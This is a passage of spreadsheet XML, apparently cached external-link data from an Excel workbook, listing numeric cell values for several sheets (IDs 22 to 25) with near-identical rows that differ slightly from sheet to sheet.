            <v>63.6333451369216</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.0994098205855</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>10.83</v>
          </cell>
          <cell r="R107">
            <v>209.12</v>
          </cell>
          <cell r="S107">
            <v>2694.55</v>
          </cell>
          <cell r="T107">
            <v>45.125</v>
          </cell>
          <cell r="U107">
            <v>45.859649122807</v>
          </cell>
          <cell r="V107">
            <v>31.805358829084</v>
          </cell>
          <cell r="W107">
            <v>123.638042474608</v>
          </cell>
          <cell r="X107">
            <v>126.429801071155</v>
          </cell>
          <cell r="Y107">
            <v>131.504332819952</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>213.31</v>
          </cell>
          <cell r="S108">
            <v>2410.16</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>46.7785087719298</v>
          </cell>
          <cell r="V108">
            <v>28.4485363550519</v>
          </cell>
          <cell r="W108">
            <v>139.306846999155</v>
          </cell>
          <cell r="X108">
            <v>132.834841310768</v>
          </cell>
          <cell r="Y108">
            <v>127.903126763369</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>148.82</v>
          </cell>
          <cell r="S109">
            <v>2944.40999999999</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>32.6359649122807</v>
          </cell>
          <cell r="V109">
            <v>34.7546033994334</v>
          </cell>
          <cell r="W109">
            <v>244.209636517329</v>
          </cell>
          <cell r="X109">
            <v>272.920306410429</v>
          </cell>
          <cell r="Y109">
            <v>271.394269140507</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>9.83</v>
          </cell>
          <cell r="R110">
            <v>154.66</v>
          </cell>
          <cell r="S110">
            <v>2918.72</v>
          </cell>
          <cell r="T110">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U110">
            <v>33.9166666666667</v>
          </cell>
          <cell r="V110">
            <v>34.4513692162417</v>
          </cell>
          <cell r="W110">
            <v>226.75483214649</v>
          </cell>
          <cell r="X110">
            <v>255.838613733351</v>
          </cell>
          <cell r="Y110">
            <v>268.161385812959</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="22">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6965.79</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>121768.992</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>8243</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7650.42</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>64851.59</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>552.94</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>9701.56</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>5890</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4183.64</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>36903.18</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>2353</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1297.66</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>12606.71</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1616.18</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>5640.14</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>374.68</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>445</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>957.766</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1406.79</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>48.118125</v>
          </cell>
          <cell r="V101">
            <v>63.7274717514124</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.4886887947269</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>48.118125</v>
          </cell>
          <cell r="V104">
            <v>63.4535899246704</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.0059086629002</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.67</v>
          </cell>
          <cell r="R107">
            <v>220.79</v>
          </cell>
          <cell r="S107">
            <v>2706.22</v>
          </cell>
          <cell r="T107">
            <v>48.625</v>
          </cell>
          <cell r="U107">
            <v>45.9979166666667</v>
          </cell>
          <cell r="V107">
            <v>31.8528719397363</v>
          </cell>
          <cell r="W107">
            <v>131.876606683805</v>
          </cell>
          <cell r="X107">
            <v>126.717695547806</v>
          </cell>
          <cell r="Y107">
            <v>131.505938172063</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.67</v>
          </cell>
          <cell r="R108">
            <v>224.98</v>
          </cell>
          <cell r="S108">
            <v>2421.83</v>
          </cell>
          <cell r="T108">
            <v>48.625</v>
          </cell>
          <cell r="U108">
            <v>46.8708333333333</v>
          </cell>
          <cell r="V108">
            <v>28.5055320150659</v>
          </cell>
          <cell r="W108">
            <v>130.077120822622</v>
          </cell>
          <cell r="X108">
            <v>132.691794826207</v>
          </cell>
          <cell r="Y108">
            <v>127.913602523712</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.67</v>
          </cell>
          <cell r="R109">
            <v>160.49</v>
          </cell>
          <cell r="S109">
            <v>2956.07999999999</v>
          </cell>
          <cell r="T109">
            <v>48.625</v>
          </cell>
          <cell r="U109">
            <v>33.4354166666667</v>
          </cell>
          <cell r="V109">
            <v>34.7937853107344</v>
          </cell>
          <cell r="W109">
            <v>242.759211653813</v>
          </cell>
          <cell r="X109">
            <v>270.727148108916</v>
          </cell>
          <cell r="Y109">
            <v>271.281223782848</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.83</v>
          </cell>
          <cell r="R110">
            <v>166.49</v>
          </cell>
          <cell r="S110">
            <v>2930.55</v>
          </cell>
          <cell r="T110">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U110">
            <v>34.6854166666667</v>
          </cell>
          <cell r="V110">
            <v>34.4932909604519</v>
          </cell>
          <cell r="W110">
            <v>198.901098901099</v>
          </cell>
          <cell r="X110">
            <v>251.792900474503</v>
          </cell>
          <cell r="Y110">
            <v>267.881796932317</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="23">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8728.51</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>113040.482</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>7896</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7603.28</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>65144.31</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>396.56</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>9305</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>5527</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4282.28</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>38147.9</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>2369</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1086.64</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>13889.07</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1837.8</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>3802.34</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>513.48</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>435</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1036.246</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2638.51</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>45.8267857142857</v>
          </cell>
          <cell r="V101">
            <v>63.5479577464789</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.3943544600939</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>45.8267857142857</v>
          </cell>
          <cell r="V104">
            <v>63.2748474178404</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.9129342723005</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>232.62</v>
          </cell>
          <cell r="S107">
            <v>2718.05</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.1547619047619</v>
          </cell>
          <cell r="V107">
            <v>31.9019953051643</v>
          </cell>
          <cell r="W107">
            <v>133.474218089603</v>
          </cell>
          <cell r="X107">
            <v>127.061301693749</v>
          </cell>
          <cell r="Y107">
            <v>131.514504884016</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>236.81</v>
          </cell>
          <cell r="S108">
            <v>2433.66</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>46.9861111111111</v>
          </cell>
          <cell r="V108">
            <v>28.5640845070422</v>
          </cell>
          <cell r="W108">
            <v>130.684699915469</v>
          </cell>
          <cell r="X108">
            <v>132.591529073941</v>
          </cell>
          <cell r="Y108">
            <v>127.927072803925</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.5</v>
          </cell>
          <cell r="R109">
            <v>171.99</v>
          </cell>
          <cell r="S109">
            <v>2967.57999999999</v>
          </cell>
          <cell r="T109">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U109">
            <v>34.125</v>
          </cell>
          <cell r="V109">
            <v>34.8307511737089</v>
          </cell>
          <cell r="W109">
            <v>208.869565217391</v>
          </cell>
          <cell r="X109">
            <v>266.591080876795</v>
          </cell>
          <cell r="Y109">
            <v>271.039365408852</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.83</v>
          </cell>
          <cell r="R110">
            <v>178.32</v>
          </cell>
          <cell r="S110">
            <v>2942.38</v>
          </cell>
          <cell r="T110">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U110">
            <v>35.3809523809524</v>
          </cell>
          <cell r="V110">
            <v>34.5349765258215</v>
          </cell>
          <cell r="W110">
            <v>200.253592561285</v>
          </cell>
          <cell r="X110">
            <v>248.373710183939</v>
          </cell>
          <cell r="Y110">
            <v>267.609894031363</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="24">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7599</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>105441.482</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>9272</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8286.95</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>66129.36</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>251.3</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>9053.7</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>7753</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5006.07</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>40894.83</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1742.5</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>12146.57</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1519</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1287.08</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>4034.26</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>545.82</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>378</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1204.066</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>0</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>43.74375</v>
          </cell>
          <cell r="V101">
            <v>63.369452247191</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.300550093633</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>43.74375</v>
          </cell>
          <cell r="V104">
            <v>63.097109082397</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.8204822097378</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>244.45</v>
          </cell>
          <cell r="S107">
            <v>2729.88</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.2973484848485</v>
          </cell>
          <cell r="V107">
            <v>31.9508426966292</v>
          </cell>
          <cell r="W107">
            <v>125.950972104818</v>
          </cell>
          <cell r="X107">
            <v>127.007568009818</v>
          </cell>
          <cell r="Y107">
            <v>131.490395182206</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>248.64</v>
          </cell>
          <cell r="S108">
            <v>2445.49</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.0909090909091</v>
          </cell>
          <cell r="V108">
            <v>28.6223080524344</v>
          </cell>
          <cell r="W108">
            <v>128.402366863905</v>
          </cell>
          <cell r="X108">
            <v>132.392213642214</v>
          </cell>
          <cell r="Y108">
            <v>127.929372027692</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>183.82</v>
          </cell>
          <cell r="S109">
            <v>2979.40999999999</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>34.8143939393939</v>
          </cell>
          <cell r="V109">
            <v>34.8713717228464</v>
          </cell>
          <cell r="W109">
            <v>258.32628909552</v>
          </cell>
          <cell r="X109">
            <v>266.059188336416</v>
          </cell>
          <cell r="Y109">
            <v>270.988887061533</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.83</v>
          </cell>
          <cell r="R110">
            <v>190.15</v>
          </cell>
          <cell r="S110">
            <v>2954.21</v>
          </cell>
          <cell r="T110">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U110">
            <v>36.0132575757576</v>
          </cell>
          <cell r="V110">
            <v>34.5764279026217</v>
          </cell>
          <cell r="W110">
            <v>271.090448013525</v>
          </cell>
          <cell r="X110">
            <v>249.787010255062</v>
          </cell>
          <cell r="Y110">
            <v>267.623831751975</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="25">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7954.68</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>97486.802</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>8073</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8463.26</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>65739.1</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>605.1</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>8448.6</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>6051</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5038.48</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>41907.35</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>536</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1048.98</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>11633.59</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1486</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1770.7</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>3749.56</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>321.24</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>357</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1168.306</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1533.68</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>41.841847826087</v>
          </cell>
          <cell r="V101">
            <v>63.1919467787115</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.2072712418301</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
